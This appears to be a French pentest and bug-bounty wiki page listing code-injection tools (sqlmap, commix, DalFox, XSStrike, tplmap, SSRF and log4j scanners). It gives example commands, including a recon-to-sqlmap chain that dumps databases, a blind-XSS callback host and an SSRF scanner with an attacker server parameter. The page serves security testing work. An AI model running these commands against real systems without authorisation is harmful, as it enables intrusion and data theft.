Injections
Outils dédiés aux injections de code
Dernière mise à jour
Cet article vous a-t-il été utile ?
Outils dédiés aux injections de code
Dernière mise à jour
Cet article vous a-t-il été utile ?
: Serveur dédié aux blind xss.
: Cela vous créer un domaine en m.pipedream.net puis vous permet d'analyser les requêtes http qui lui sont envoyées.
: Doc complète sur les injections SQL.
Commix est un outil permettant de scanner et exploiter automatiquement les failles d'injection de code.
Exemple d'utilisation:
$ commix -u https://target.com/
ressource:
Sqlmap est un outil permettant de scanner et exploiter automatiquement les failles d'injection SQL.
Exemple d'utilisation:
$ sqlmap -u http://target.com/
Bug bounty tips:
$sublist3r -d target.com | tee -a subdomains.txt
cat subdomains.txt | httpx | tee -a alive.txt
cat alive.txt | waybackurls | tee -a urls.txt
gf sqli urls.txt >> possible_sqli.txt
sqlmap -m sqli.txt --dbs --batch
Ghauri est un outil semblable à Sqlmap pouvant parfois compléter ses résultats et inversement.
Exemple d'utilisation:
$ ghauri -u https://target.com/exemple?id=1 --dbs
Atlas est un outil semblable à Sqlmap conçu soécialement pour contourner les filtres et WAF.
HBSQLI est un outil de détection et d'exploitation d'injection SQL dédié spécifiquement aux en-têtes HTTP:
Exemple d'utilisation:
$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v
DalFox est un puissant outil d'analyse XSS open source, un analyseur de paramètres et un utilitaire qui accélère le processus de détection et de vérification des failles XSS.
Exemple d'utilisation:
$ dalfox url https://target.com/xxx -b https://hawul.xss.ht
Airixss sert à détecter d'éventuels endpoints vulnérables aux XSS durant la phase de reconnaissance.
Exemple d'utilisation:
$ cat endpoints.txt | airixss -payload "alert(1)"
Xspear est un scanner de faille XSS.
Exemple d'utilisation:
$ xspear -u "https://target.com/index.php?id=123" -v 1
XSStrike est également un scanner de faille XSS.
Exemple d'utilisation:
$ python3 xsstrike.py -u https://target.com/index.php?id=123
Kxss est un outil permettant de tester les paramètres d'une liste d'endpoints pour en ressortir les caractères qui sont ou non filtrés dans le but de trouver de potentielles failles XSS, c'est au pentester ensuite de tester manuellement le paramètre pour vérifier s'il est bien vulnérable.
exemple d'utilisation:
$ echo 'http://target.com/?name=Mathis&age=20' | kxss
L'extension Dom invader de Burp Suite permet de tester la reflexion d'un "canary" lors de la navigation sur un site web afin de trouver des failles de type DOM XSS.
Tplmap est un outil qui permet de scanner et exploiter les failles SSTI.
Exemple d'utilisation:
$ ./tplmap -u https://target.com/
Un scanner de SSRF automatisé. Donnez simplement le nom de domaine cible et votre serveur et détendez-vous ! ;) A également des options pour trouver des XSS et redirections ouvertes.
Exemple d'utilisation:
$ ./ssrfire.sh -d target.com -s attackerserver -c cookie
HostPanic est un outil de piratage permettant de rechercher des injections d'host header.
Exemple d'utilisation:
$ python3 main.py -u https://target.com/ -v
Log4j-scan est un scanner de vulnérabilité pour log4j.
Exemple d'utilisation:
$ python3 log4j-scan.py -u https://target.com/
Spring4shell-scan est un scanner de vulnérabilité spring4shell.
Exemple d'utilisation:
$ python3 spring4shell-scan.py -u https://target.com/
L'extension Hack Bar de Burp suite permet de coller des payloads de toutes sortes directement dans l'onglet repeater afin de gagner du temps sur l'écriture de ceux-ci.
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource:
ressource: